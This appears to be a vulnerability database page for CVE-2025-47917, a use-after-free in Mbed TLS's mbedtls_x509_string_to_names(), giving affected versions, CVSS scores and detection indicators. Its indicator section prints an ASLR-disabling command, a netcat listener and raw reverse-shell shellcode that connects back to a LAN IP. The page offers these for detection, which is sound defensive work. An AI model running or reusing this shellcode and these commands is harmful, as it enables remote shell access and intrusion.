cbcvebase.
CVE-2025-47917
published 2025-07-20

CVE-2025-47917: Mbed TLS before 3.6.4 allows a use-after-free in certain situations of applications that are developed in accordance with the documentation. The function…

PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
1.99%
78.2th percentile
Mbed TLS before 3.6.4 allows a use-after-free in certain situations of applications that are developed in accordance with the documentation. The function mbedtls_x509_string_to_names() takes a head argument that is documented as an output argument. The documentation does not suggest that the function will free that pointer; however, the function does call mbedtls_asn1_free_named_data_list() on that argument, which performs a deep free(). As a result, application code that uses this function (relying only on documented behavior) is likely to still hold pointers to the memory blocks that were freed, resulting in a high risk of use-after-free or double-free. In particular, the two sample programs x509/cert_write and x509/cert_req are affected (use-after-free if the san string contains more than one DN).

Affected

10 ranges
VendorProductVersion rangeFixed in
armmbed_tls< 3.6.43.6.4
debianmbedtls< mbedtls 2.16.9-0.1+deb11u3 (bullseye)mbedtls 2.16.9-0.1+deb11u3 (bullseye)
mbedmbedtls< 3.6.43.6.4
mbedmbedtls>= 0 < 2.16.9-0.1+deb11u32.16.9-0.1+deb11u3
mbedmbedtls>= 0 < 3.6.4-13.6.4-1
mbedmbedtls>= 0 < 3.6.4-13.6.4-1
mbedmbedtls>= 0 < 2.8.0-1ubuntu0.1~esm12.8.0-1ubuntu0.1~esm1
mbedmbedtls>= 0 < 2.16.4-1ubuntu2+esm12.16.4-1ubuntu2+esm1
mbedmbedtls>= 0 < 2.28.0-1ubuntu0.1~esm12.28.0-1ubuntu0.1~esm1
mbedmbedtls>= 0 < 2.28.8-1ubuntu0.1~esm12.28.8-1ubuntu0.1~esm1

Detection & IOCsextracted from sources · hover to see the quote

commandecho 0 | sudo tee /proc/sys/kernel/randomize_va_space
ip192.168.92.187
port4454
commandnc -lvnp 4454
bytes
48 31 d2 b8 29 00 00 00 be 01 00 00 00 bf 02 00 00 00 0f 05 48 89 c7 49 89 c4 48 83 ec 10 c7 44 24 0c bd 5c a8 c0 66 c7 44 24 0a 11 c1 66 c7 44 24 08 02 00 48 89 e6 ba 10 00 00 00 b8 2a 00 00 00 0f 05 4c 89 e7 be 02 00 00 00 b8 21 00 00 00 0f 05 48 ff ce 79 f4 48 31 d2 48 b8 62 2f 73 62 61 73 68 00 50 48 b8 2f 75 73 72 2f 62 69 6e 50 48 89 e7 52 57 48 89 e6 b8 3b 00 00 00 0f 05
  • Trigger condition: use-after-free is triggered when mbedtls_x509_string_to_names() is called a second time with a san string containing more than one DN (e.g., 'CN=AAAA,CN=BBBB'), causing the function to free the head pointer that the caller still holds.
  • The exploit requires ASLR to be disabled (/proc/sys/kernel/randomize_va_space == 0) for reliable exploitation; detect attempts to disable ASLR as a precursor indicator.
  • The exploit shellcode connects back to a remote IP on port 4454 using a reverse shell to /usr/bin/sbash; monitor for unexpected outbound connections on port 4454 from processes linked to mbedtls.
  • The exploit uses mmap with PROT_READ|PROT_WRITE|PROT_EXEC and MAP_ANON|MAP_PRIVATE to allocate executable shellcode pages; detect anonymous RWX memory mappings in processes using mbedtls.
  • Vulnerable code path: mbedtls_x509_string_to_names() internally calls mbedtls_asn1_free_named_data_list() on the head argument without documenting this behavior, performing a deep free. Monitor for double-free or heap corruption signals in applications calling this function.
  • ·The exploit PoC hardcodes a private LAN IP (192.168.92.187) as the reverse shell callback target; this is a lab/test address and will differ in real-world attacks.
  • ·Reliable exploitation requires ASLR to be disabled; exploitation against hardened systems with ASLR enabled is significantly less reliable.
  • ·The exploit title states 'Mbed TLS 3.6.4 - Use-After-Free' but the CVE and NVD description state the vulnerability affects versions *before* 3.6.4; 3.6.4 is the fixed version.
  • ·MicroPython is not affected by this CVE despite using Mbed TLS, because it does not call the vulnerable function mbedtls_x509_string_to_names().

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vendor_ubuntu9.8CRITICAL
vendor_debian8.9HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.